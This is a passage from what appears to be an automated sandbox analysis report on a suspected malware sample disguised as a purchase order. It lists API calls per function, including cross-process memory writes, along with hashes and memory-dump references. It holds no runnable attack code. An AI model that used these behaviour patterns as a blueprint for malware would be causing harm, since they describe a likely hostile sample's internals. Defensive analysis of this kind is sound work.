                      • Opcode Fuzzy Hash: 660e39f26c3e0fdbd219807e8ed9a835e8725bd4cae1e387baf3ae24df799ce3
                      • Instruction Fuzzy Hash: 08018C35C00619EBCF00AFA9ED48AEEBB78FF08B01F400042E506B7250CF789A60C7A1
                      APIs
                      • CLSIDFromProgID.OLE32 ref: 00ACA874
                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00ACA88F
                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00ACA8AD
                      • CLSIDFromString.OLE32(?,?), ref: 00ACA8B9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                      • Instruction ID: 38e4ec63544c54f6787f5d6b435fb1b46fb5341b883ac6cd739fd30ecd99800d
                      • Opcode Fuzzy Hash: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                      • Instruction Fuzzy Hash: 7A014B76600218EFDB115F68EC84BAABBBDEF54799F158428B901D3210DB70DD419BA1
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ACB7A5
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ACB7AF
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ACB7BE
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00ACB7C5
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ACB7DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                      • Instruction ID: 734bda5f732ae06615e42d70abfc479fe2830dfa585102a558899dce4417595b
                      • Opcode Fuzzy Hash: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                      • Instruction Fuzzy Hash: E4F0AF752412547FEB100FA4AC89FA73BACFF8A755F408019F950C7150CB619C018A70
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ACB806
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB810
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB81F
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB826
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB83C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                      • Instruction ID: d826f8f89077748ac8adf52facfb8f32e59748bbb68543b0180f48d855da62a2
                      • Opcode Fuzzy Hash: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                      • Instruction Fuzzy Hash: 8AF03775210214AFEB215FA5EC99FAB3B6CFF4A754F008029F941D7150CFA198518B70
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00ACFA8F
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ACFAA6
                      • MessageBeep.USER32(00000000), ref: 00ACFABE
                      • KillTimer.USER32(?,0000040A), ref: 00ACFADA
                      • EndDialog.USER32(?,00000001), ref: 00ACFAF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 42bd695c1e943394f0c47d8b086dc899ed362fd473c169b7e1bae3ad87d9ed9b
                      • Instruction ID: d97e0c5f2295b8ef5c84db6954dfc6a0cd1bb9f56bd20ce18c17ab2acc050ae0
                      • Opcode Fuzzy Hash: 42bd695c1e943394f0c47d8b086dc899ed362fd473c169b7e1bae3ad87d9ed9b
                      • Instruction Fuzzy Hash: 29018130500704AFEB259B14DD4EFD6B7BABB10B49F45416DB587A60E0DBF4A9448A50
                      APIs
                      • EndPath.GDI32(?), ref: 00AAB526
                      • StrokeAndFillPath.GDI32(?,?,00B0F583,00000000,?), ref: 00AAB542
                      • SelectObject.GDI32(?,00000000), ref: 00AAB555
                      • DeleteObject.GDI32 ref: 00AAB568
                      • StrokePath.GDI32(?), ref: 00AAB583
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                      • Instruction ID: e9b8deebff220724ed2c364bcbaba663ec5eb60f00ab9ae75d814617a1ecaf22
                      • Opcode Fuzzy Hash: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                      • Instruction Fuzzy Hash: 34F0EC30450705EBDB255F69ED0C7A43FE5B702327F548654E4AA8B1F1CB3489A5DF20
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00ADFAB2
                      • CoCreateInstance.OLE32(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADFACA
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • CoUninitialize.OLE32 ref: 00ADFD2D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_memmove
                      • String ID: .lnk
                      • API String ID: 2683427295-24824748
                      • Opcode ID: a3419ba7e8031d4d13837455028147eb5d78aa4c1d7c3cc88f6674b2757ace26
                      • Instruction ID: 9c15fad10a67814eddd2b086eb9eca570320ec69fa6d78ba587cd4897ba751f4
                      • Opcode Fuzzy Hash: a3419ba7e8031d4d13837455028147eb5d78aa4c1d7c3cc88f6674b2757ace26
                      • Instruction Fuzzy Hash: 5CA15D71604305AFC700EF64C991EABB7EDEF99704F40491DF1569B1A1EB70EA09CBA2
                      APIs
                        • Part of subcall function 00AD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00AD78CB
                      • CoInitialize.OLE32(00000000), ref: 00ADF04D
                      • CoCreateInstance.OLE32(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADF066
                      • CoUninitialize.OLE32 ref: 00ADF083
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                      • String ID: .lnk
                      • API String ID: 2126378814-24824748
                      • Opcode ID: ad3a3e0041d77b2a8acf740670bf52efe0729897fed77ebaf19c85763382adc3
                      • Instruction ID: cff92b7e7b78ece1b9b8cc0ef5a103a31ba70cc86fc3eab3569b965a70bf4a5c
                      • Opcode Fuzzy Hash: ad3a3e0041d77b2a8acf740670bf52efe0729897fed77ebaf19c85763382adc3
                      • Instruction Fuzzy Hash: 26A15575604301AFCB10DF14C984E5ABBE5FF89320F148999F99A9B3A2CB31ED45CB91
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00AB3F7D
                        • Part of subcall function 00ABEE80: __87except.LIBCMT ref: 00ABEEBB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorHandling__87except__start
                      • String ID: pow
                      • API String ID: 2905807303-2276729525
                      • Opcode ID: b5dd0bc41df8a16ab95753c7238bfdf3cfdb5cecc4028f2998f5be699ced8866
                      • Instruction ID: 0dc1a205b84ecda453a6c232fa44438a8b75d0a19fddb54ba2bc86cae8ce0533
                      • Opcode Fuzzy Hash: b5dd0bc41df8a16ab95753c7238bfdf3cfdb5cecc4028f2998f5be699ced8866
                      • Instruction Fuzzy Hash: F7512B32E0820296DF15B738CD413FA6BBC9B40710F248969F4968A1ABEF35CDD5D647
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID: #$+
                      • API String ID: 0-2552117581
                      • Opcode ID: 3b010962832c55b2d565c6d712329b98b421414be91d99e3d0c894aa25c7aa16
                      • Instruction ID: d1812cc20e156dc930bbb69c2f6725dc5bfb31f8f492c87c4791b874f34213d6
                      • Opcode Fuzzy Hash: 3b010962832c55b2d565c6d712329b98b421414be91d99e3d0c894aa25c7aa16
                      • Instruction Fuzzy Hash: 54511EB4604246CFDF11EF68C495AFA7BE4EF26310F144099FA929B2E0D7309D46CB20
                      APIs
                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B2DC40,?,0000000F,0000000C,00000016,00B2DC40,?), ref: 00AD507B
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00A9B8A7: _memmove.LIBCMT ref: 00A9B8FB
                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00AD50FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper$__itow__swprintf_memmove
                      • String ID: REMOVE$THIS
                      • API String ID: 2528338962-776492005
                      • Opcode ID: 3f81fbfdc98f5af15624eeb4153eb6a8cd89c7b3d6f6d468d846f52e42acbcd3
                      • Instruction ID: 62efb08cc4a7a08a025426840d86854a0a6e5067581d0861e2bfb575e0358bf5
                      • Opcode Fuzzy Hash: 3f81fbfdc98f5af15624eeb4153eb6a8cd89c7b3d6f6d468d846f52e42acbcd3
                      • Instruction Fuzzy Hash: 08417F35A00609AFCF05EF64C981AAEB7F5BF49304F04816AF856AB392DB349D41CB50
                      APIs
                        • Part of subcall function 00AD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACC9FE,?,?,00000034,00000800,?,00000034), ref: 00AD4D6B
                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ACCFC9
                        • Part of subcall function 00AD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AD4D36
                        • Part of subcall function 00AD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00AD4C90
                        • Part of subcall function 00AD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CA0
                        • Part of subcall function 00AD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CB6
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD036
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD083
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                      • String ID: @
                      • API String ID: 4150878124-2766056989
                      • Opcode ID: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                      • Instruction ID: 18b8890b91baeb8cc75bd9f3c069f00559e07d110256702948fa64ebb082f309
                      • Opcode Fuzzy Hash: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                      • Instruction Fuzzy Hash: C9413E76900218BFDB10DFA4CD85FDEBBB8EF49700F108099EA56B7191DA706E45CB61
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2DBF0,00000000,?,?,?,?), ref: 00AFA4E6
                      • GetWindowLongW.USER32 ref: 00AFA503
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AFA513
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                      • Instruction ID: 5d20b04675314faccf8c610c182e9c8c4623ccead32a42994517bfec790a87ed
                      • Opcode Fuzzy Hash: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                      • Instruction Fuzzy Hash: D531B271240609AFDB218F78CC45BE67BA9EF59334F248715F979932E0D770E8509B50
                      APIs
                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AFA74F
                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AFA75D
                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AFA764
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$DestroyWindow
                      • String ID: msctls_updown32
                      • API String ID: 4014797782-2298589950
                      • Opcode ID: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                      • Instruction ID: 33793160c703fbcd96ad1ac5cc824f9412307aafe6515a26084339c58f0239eb
                      • Opcode Fuzzy Hash: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                      • Instruction Fuzzy Hash: 182151B5A00209AFDB10EF68CCC1EB737ADEB5A394B040459FA05D7351CB70EC11DA61
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AF983D
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AF984D
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AF9872
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
                      • Instruction ID: 22cb7ef7a75684f7d4ca86d3036741c910300010f078820616027ae9ba73bf49
                      • Opcode Fuzzy Hash: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
                      • Instruction Fuzzy Hash: 2E21A73161021CBFEF119F94CC85FBB3BAAEF8A794F018124FA055B190CA719C5187E0
                      APIs
                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AFA27B
                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AFA290
                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AFA29D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: msctls_trackbar32
                      • API String ID: 3850602802-1010561917
                      • Opcode ID: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                      • Instruction ID: 30bb8ad92d9f038a0e6b613a05622f9b6baf4b1eb5025f6db86e39cae6a600b4
                      • Opcode Fuzzy Hash: 6ef2dc3bf1e6ba8d15d3d5f5e16f764dacaf0be945f3b4bf10532457bfac30fa
                      • Instruction Fuzzy Hash: 2611E771240308BAEB205FA5CC46FE73BA8EF99B54F114118FB45970A0D6729851DB60
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AB3028,?), ref: 00AB2F79
                      • GetProcAddress.KERNEL32(00000000), ref: 00AB2F80
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RoInitialize$combase.dll
                      • API String ID: 2574300362-340411864
                      • Opcode ID: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                      • Instruction ID: 059dc18c693675b769ba6ff337a84623e1effef0b9e3187e8ef2cfb695228cf1
                      • Opcode Fuzzy Hash: 877b2c39e35faf0200fad7a64b7f5755e6c1f75d9b0c89cde034fbff347f9b86
                      • Instruction Fuzzy Hash: E1E01A746E4702AAEB106F70EC49BD53AA8BB01746F5040A4B202F71B0CFB54050DF05
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AB2F4E), ref: 00AB304E
                      • GetProcAddress.KERNEL32(00000000), ref: 00AB3055
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RoUninitialize$combase.dll
                      • API String ID: 2574300362-2819208100
                      • Opcode ID: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
                      • Instruction ID: 0cd3248596322eacec370be04b585ced21d1f0d770cb4a26f6b6310533e7fc42
                      • Opcode Fuzzy Hash: c6d6d1f95668f8daa072e552bfd467ceb07458cea07000f190d2f562e25dd2a4
